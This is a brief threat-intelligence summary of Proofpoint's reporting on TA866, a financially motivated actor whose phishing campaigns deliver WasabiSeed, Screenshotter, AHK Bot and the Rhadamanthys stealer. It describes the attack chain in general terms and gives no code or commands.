TA866: A Financially Motivated Group with a Custom Toolset
TA866: A Financially Motivated Group with a Custom Toolset
A cluster of financially motivated threat activity targeting organizations in the United States and Germany is being tracked by Proofpoint as threat actor, TA866. Proofpoint researchers report the actor has been active since October 2022, and uses phishing emails to distribute information-stealing malware. TA866's email volume grew steadily from distributing one to two emails on a given day, to tens of thousands by late January 2023. Proofpoint characterizes TA866 as an organized and sophisticated actor capable of performing "well thought-out attacks at scale based on their availability of custom tools; ability and connections to purchase tools and services from other vendors; and increasing activity volumes." TA866's toolset is comprised of AHK Bot to download AutoHotKey scripts, WasabiSeed a malware downloader and installer, Screenshotter a screenshot tool, and Rhadamanthys information-stealing malware. WasabiSeed is periodically checked by the threat actors to evaluate the value of the target, which determines the next steps such as using Screenshotter to capture more screenshots and/or executing the AHK bot to proceed to the next phase of their attack. Comments and variable names in the tools deployed by TA866 are written in the Russian language.
TA866's attack chain initiates from the victim executing weaponized URLs or attachments found in the phishing email to retrieve a malicious JavaScript file. TA866 is observed to use the Traffic Distribution System (TDS) to filter and route traffic to their payloads. The JavaScript when executed retrieves and launches an MSI package that is the WasabiSeed installer. WasabiSeed downloads and installs Screenshotter as well as any additional payloads and creates persistence by adding an autorun shortcut to the Windows Startup folder. AHK Bot and Rhadamanthys stealer are dropped when TA866 deems the victim to be of interest to proceed in their attack. As assessed by Proofpoint, the "use of Screenshotter to gather information on a compromised host before deploying additional payloads indicates the threat actor is manually reviewing infections to identify high-value targets. The AD profiling is especially concerning as follow-on activities could lead to compromises on all domain-joined hosts."